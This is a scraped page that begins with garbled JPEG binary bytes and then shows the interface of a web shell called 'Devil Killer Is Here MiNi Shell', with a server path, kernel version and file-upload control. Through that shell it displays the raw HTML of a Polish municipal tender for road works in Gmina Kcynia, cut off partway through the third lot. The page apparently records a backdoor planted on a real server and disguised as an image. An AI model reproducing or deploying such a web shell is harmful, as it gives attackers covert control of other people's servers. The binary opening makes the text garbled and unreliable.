JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220208/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220208/0005063801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa, przebudowa i remont dróg w Gminie Kcynia </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kcynia</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092350872</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kcynia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">89-240</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL617 - Inowrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@kcynia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kcynia.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa, przebudowa i remont dróg w Gminie Kcynia </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b76e7831-88ae-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00050638</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00019958/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa, przebudowa i remont dróg w Gminie Kcynia</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/475887 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Wszystkie szczegóły dot. komunikacji elektronicznej, strony internetowej, oświadczenia z art. 125 ust. 1, podmiotowych i przedmiotowych środków dowodowych oraz innych oświadczeń i dokumentów zawarte są w SWZ dostępnej pod adresem: https://platformazakupowa.pl/transakcja/475887</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej zawarte są w SWZ dostępnej pod adresem: https://platformazakupowa.pl/transakcja/475887</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje nt. RODO zawarte są w SWZ dostępnej pod<br/>adresem: https://platformazakupowa.pl/transakcja/475887</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje nt. RODO zawarte są w SWZ dostępnej pod<br/>adresem: https://platformazakupowa.pl/transakcja/475887</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.1.475887.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa drogi w m. Kazimierzewo:<br/>a)	roboty przygotowawcze, na które składają się w szczególności:<br/>-	roboty pomiarowe na odcinku ok. 1 851 mb,<br/>-	ścinanie piłą mechaniczną drzew o średnicy 16-65+ cm – ok. 28 szt.,<br/>-	mechaniczne karczowanie pni o średnicy 16-150 cm – ok. 28 szt.,<br/>-	mechaniczne karczowanie krzaków – ok. 0,076 ha,<br/>b)	roboty ziemne, na które składają się w szczególności:<br/>-	roboty ziemne wykonywane koparkami z transportem urobku – ok. 4 730 m3,<br/>-	ręczne formowanie nasypów – ok. 265 m3,<br/>c)	roboty pomocnicze w zakresie rurociągów i kabli, na które składają się w szczególności:<br/>-	wykopy liniowe o ścianach pionowych – ok. 26 m3,<br/>-	układanie w wykopie rur ochronnych – ok. 81 m,<br/>-	zasypywanie wykopów ze skarpami – ok. 26 m3,<br/>d)	roboty w zakresie przepustów, na które składają się w szczególności:<br/>-	budowa prefabrykowanych przepustów drogowych rurowych jednootworowych – ok. 13 m,<br/>-	obudowa wlotów przepustów – ok. 4 m3,<br/>-	brukowanie skarp brukowcem z kamienia narzutowego na zaprawie – ok. 10 m2,<br/>e)	roboty dot. nawierzchni, na które składają się w szczególności:<br/>-	profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne – ok. 8 040 m2, <br/>-	wykonanie warstwy odsączającej z piasku wykonywane i zagęszczane mechaniczne – ok. 8 040 m2,<br/>-	wykonanie podbudowy z kruszywa niezwiązanego o grubości warstwy po zagęszczeniu 20 cm – ok. 8 040 m2,<br/>-	mechaniczne oczyszczenie nawierzchni nieulepszonej – ok. 7 707 m2,<br/>-	skropienie nawierzchni drogowych emulsją asfaltową – ok. 7 707 m2,<br/>-	wykonanie warstwy wiążącej z betonu asfaltowego o grubości po zagęszczeniu 5 cm – ok. 7 707 m2,<br/>-	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości po zagęszczeniu 4 cm – ok. 7 485 m2,<br/>f)	roboty dot. zjazdów, na które składają się w szczególności:<br/>-	profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne – ok. 1 125 m2,<br/>-	wykonanie warstwy odsączającej z piasku o grubości po zagęszczeniu 22 cm – ok. 1 125 m2,<br/>-	wykonanie podbudowy niezwiązanego, grubość warstwy po zagęszczeniu 12 cm – ok. 1 125 m2,<br/>-	mechaniczne oczyszczenie nawierzchni – ok. 1 125 m2,<br/>-	skropienie nawierzchni drogowych emulsją asfaltową – ok. 1 128 m2 ,<br/>-	wykonanie warstwy ścieralnej o grubości po zagęszczeniu 4 cm – ok. 1 023 m2,<br/>-	wykonanie przepustów rurowych pod zjazdami z rur betonowych o średnicy 40 cm – ok. 282 mb,<br/>-	brukowanie skarp brukowcem z kamienia narzutowego na zaprawie – ok. 114 m2,<br/>g)	roboty dot. chodników, na które składają się w szczególności:<br/>-	wykonanie chodników z masy asfaltowej – ok. 4m2,<br/>h)	roboty dot. instalowania znaków drogowych i barier drogowych, na które składają się w szczególności:<br/>-	ustawienie słupków do pionowych znaków drogowych – 4 szt.,<br/>-	montaż tablic znaków drogowych – 4 szt.<br/>-	montaż poręczy ochronnych sztywnych na słupkach – ok. 44 mb,<br/>i)	roboty dot. zieleni, na które składają się w szczególności:<br/>-	kształtowanie terenów zielonych – ok. 116 m2,<br/>j)	zapewnienie czasowej organizacji ruchu, a po zakończeniu prac – ustanowienie stałej organizacji ruchu,<br/>k)	wykonanie geodezyjnego pomiaru powykonawczego zrealizowanych obiektów drogowych wraz z potwierdzeniem złożenia operatu w ośrodku dokumentacji geodezyjnej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233123-7 - Roboty budowlane w zakresie dróg podrzędnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi w m. Rozpętek:<br/>a)	roboty przygotowawcze, na które składają się w szczególności:<br/>-	roboty pomiarowe na odcinku – ok. 973 mb,<br/>-	rozebranie słupków do znaków – szt. 1,<br/>-	zdejmowanie tablic znaków drogowych – szt. 1,<br/>b)	roboty ziemne, na które składają się w szczególności:<br/>-	roboty ziemne wykonywane koparkami z transportem urobku – ok. 347 m3,<br/>-	roboty ziemne wykonywane koparkami podsiębiernymi z transportem urobku – ok. 2 022 m3,<br/>-	zagęszczanie nasypów ubijakami mechanicznymi – ok. 347 m3,<br/>c)	roboty dot. nawierzchni, na które składają się w szczególności:<br/>-	profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne – ok. 1 891 m2, <br/>-	wykonanie warstwy odsączającej z piasku wykonywane ręcznie i zagęszczane mechaniczne – ok. 1 891 m2, <br/>-	wykonanie podbudowy betonowej gr. warstwy po zagęszczeniu 12 cm – ok. 1 891 m2, <br/>-	podbudowa z kruszywa łamanego o gr. po zagęszczeniu 15 cm – ok. 1 891 m2,<br/>-	wyrównanie istniejącej podbudowy tłuczniem kamiennym – ok. 457 m3,<br/>-	mechaniczne oczyszczenie nawierzchni nieulepszonej – ok. 3 773 m2, <br/>-	skropienie nawierzchni drogowych asfaltem – ok. 3 773 m2, <br/>-	wykonanie nawierzchni z mieszanek mineralno-bitumicznych o grubości po zagęszczeniu 4 cm – ok. 3 773 m2, <br/>-	skropienie nawierzchni drogowej asfaltem – ok. 3 676 m2,<br/>-	wykonanie warstwy ścieralnej z mieszanek mineralno-bitumicznych grysowych o grubości po zagęszczeniu 3 cm – ok. 3 676 m2,<br/>d)	roboty dot. zjazdów z kostki brukowej, na które składają się w szczególności:<br/>-	ręczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne ¬– ok. 54 m2,<br/>-	podbudowa betonowa – ok. 54 m2,<br/>-	nawierzchnia z kostki brukowej betonowej gr. 8 cm na podsypce cementowo-piaskowej gr. 4 cm – ok. 54 m2,<br/>e)	roboty dot. zjazdów bitumicznych, na które składają się w szczególności:<br/>-	mechaniczne profilowanie i zagęszczanie podłoża – ok. 408 m2,<br/>-	wykonanie warstwy odsączającej z piasku o grubości po zagęszczeniu 12 cm – ok. 408 m2, <br/>-	wykonanie podbudowy betonowej – ok. 408 m2, <br/>-	wykonanie podbudowy z kruszywa łamanego – ok. 408 m2,<br/>-	skropienie nawierzchni drogowych asfaltem – ok. 408 m2,<br/>-	wykonanie nawierzchni z mieszanek mineralno-bitumicznych – ok. 408 m2,<br/>f)	roboty dot. obrzeży, krawężników i chodników, na które składają się w szczególności:<br/>-	osadzenie ok. 61 m obrzeży betonowych na ławie o wym. 25 x 8 cm,<br/>-	osadzenie 122 m krawężników o wym. 15 x 22 x 100 cm na ławie pod krawężniki,<br/>-	wykonanie ok. 6 m2 chodnika z kostki brukowej,<br/>g)	prace wykończeniowe, na które składają się w szczególności:<br/>-	humusowanie skarp – ok. 1 521 m2,<br/>-	układanie rur ochronnych z PCV – ok. 60 m,<br/>-	wykonanie przepustów rurowych z PCV pod zjazdami – ok. 48 m,<br/>-	wykonanie nawierzchni z kostki brukowej – ok. 10 m2, <br/>-	wykonanie chodników z płyt betonowych 50 x 50 x 7 – ok. 33 m2, <br/>-	wykonanie odwodnienia liniowego z betonu – ok. 17 m,<br/>h)	instalowanie znaków drogowych, na które składają się w szczególności:<br/>-	słupki do pionowych znaków drogowych – 8 szt.,<br/>-	tablice znaków drogowych – 9 szt.,<br/>i)	zapewnienie czasowej organizacji ruchu, a po zakończeniu prac – ustanowienie stałej organizacji ruchu,<br/>j)	wykonanie geodezyjnego pomiaru powykonawczego zrealizowanych obiektów drogowych wraz z potwierdzeniem złożenia operatu w ośrodku dokumentacji geodezyjnej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233123-7 - Roboty budowlane w zakresie dróg podrzędnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa ul. Strażackiej w Kcyni:<br/>a)	roboty pomiarowe, i usuwanie wierzchniej warstwy gleby, na które składają się w szczególności:<br/>-	roboty pomiarowe przy liniowych robotach ziemnych na odcinku ok. 0,267 km,<br/>-	roboty ziemne wykonywane koparkami z transportem urobku i usunięcie warstwy ziemi urodzajnej – ok. 34 m3,<br/>b)	roboty rozbiórkowe i ziemne, na które składają się w szczególności:<br/>-	rozebranie nawierzchni grubości 5 cm z mas mineralno-bitumicznych, wykonywane mechaniczne – ok. 1 075 m2, <br/>-	rozebranie nawierzchni o gr. 16-20 cm z brukowca – ok. 912 m2,<br/>-	rozebranie podbudowy gr. 18 cm z kruszywa – ok. 179 m2,<br/>-	rozebranie krawężników kamiennych i betonowych ok. 284 m oraz obrzeży trawnikowych ok. 82 m,<br/>-	rozebranie nawierzchni z kostki brukowej betonowej wykonywane ręcznie – ok. 498 m2,<br/>-	rozebranie płyt drogowych – ok. 129 m2,<br/>c)	roboty ziemne, na które składają się w szczególności:<br/>-	roboty ziemne wykonane koparkami z transportem urobku (przygotowanie terenu pod budowę) – ok. 190 m3,<br/>d)	roboty pomocnicze w zakresie rurociągów i kabli, na które składają się w szczególności:<br/>-	wykopy liniowe o ścianach pionowych z ręcznym wydobyciem urobku – ok. 50 m3,<br/>-	układanie w wykopie rur ochronnych dwudzielnych – ok. 156 m,<br/>-	zasypanie wykopu i zagęszczenie – ok. 50 m3,<br/>e)	roboty dot. podbudowy, na które składają się w szczególności:<br/>-	wykonanie koryta na całej szerokości jezdni i chodników, wykonane mechanicznie – ok. 1 253 m2,<br/>-	wykonanie ławy pod krawężniki betonowe z oporem– ok. 27 m3,<br/>-	ustawienie krawężników nowych na podsypce cementowo-piaskowej (prostych i łukowych kamiennych) – ok. 76 m,<br/>-	ustawienie krawężników kamiennych z odzysku – ok. 193 m,<br/>-	ustawienie krawężników betonowych na podsypce cementowo-piaskowej – ok. 186 m,<br/>-	wykonanie podbudowy z kruszywa niezwiązanego przy gr. warstwy po zagęszczeniu 20 cm – ok. 641 m2,<br/>f)	roboty dot. nawierzchni, na które składają się w szczególności:<br/>-	mechaniczne oczyszczenie nawierzchni nieulepszonej, skropienie nawierzchni drogowych emulsją asfaltową – ok. 641 m2,<br/>-	warstwa wiążąca nawierzchni, wykonana z betonu asfaltowego o gr. 5 cm po zagęszczeniu – ok. 641 m2,<br/>-	mechaniczne oczyszczenie nawierzchni ulepszonej i skropienie emulsją asfaltową – ok. 641 m2,<br/>-	warstwa ścieralna nawierzchni wykonana z betonu asfaltowego o gr. 4 cm po zagęszczeniu – ok. 641 m2,<br/>-	chodniki z kostki brukowej betonowej z wypełnieniem spoin piaskiem, układane na podsypce cementowo-piaskowej, kostka o gr. 8 cm – ok. 432 m2,<br/>g)	roboty dot. zjazdów, na które składają się w szczególności:<br/>-	koryta na całej szerokości jezdni i chodników, wykonywane mechanicznie – ok. 335 m2,<br/>-	podbudowa betonowa o gr. po zagęszczeniu 12 cm – ok. 335 m2,<br/>-	krawężniki betonowe na podsypce cementowo-piaskowej – ok. 58 m,<br/>-	ułożenie kostki brukowej betonowej o gr. 8 cm, grafitowa – ok. 335 m2,<br/>h)	roboty dot. chodników, na które składają się w szczególności:<br/>-	podbudowy betonowe o gr. 10 cm po zagęszczeniu – ok. 312 m2,<br/>-	chodnik z kostki brukowej, układany na podsypce cementowo-piaskowej, o gr. kostki 8 cm – ok. 312 m2,<br/>i)	roboty dot. oznakowania poziomego, na które składają się w szczególności:<br/>-	mechaniczne malowanie linii na skrzyżowaniach i przejściach dla pieszych – ok. 20 m2,<br/>j)	roboty ziemne dot. kanalizacji sanitarnej i deszczowej, na które składają się w szczególności:<br/>-	wykopy jamiste koparkami podsiębiernymi na odkład – ok 425 m3,<br/>-	ręczne wykopy wąskoprzestrzenne lub jamiste ze skarpami o szer. dna do 1,5 m i głębokości 1,5 m – ok. 47 m3<br/>-	umocnienie pionowych ścian wykopów ok. 644 m2,<br/>-	podłoża pod kanały z materiałów sypkich o gr. 10 cm – ok. 47 m3,<br/>-	obsypka rurociągów z piasku o gr. 30 cm – ok. 141 m3,<br/>-	demontaż oraz montaż konstrukcji podwieszeń kabli energetycznych i telekomunikacyjnych typu lekkiego o rozpiętości elementu 4,0 m – ok. 12 kpl.,<br/>-	demontaż oraz montaż konstrukcji podwieszeń rurociągów i kanałów o rozpiętości elementu 4,0 m – ok. 35 kpl.,<br/>-	zasypywanie wykopów i zagęszczanie ubijakami mechanicznymi – ok. 285 m3,<br/>-	wywóz urobku ziemi – 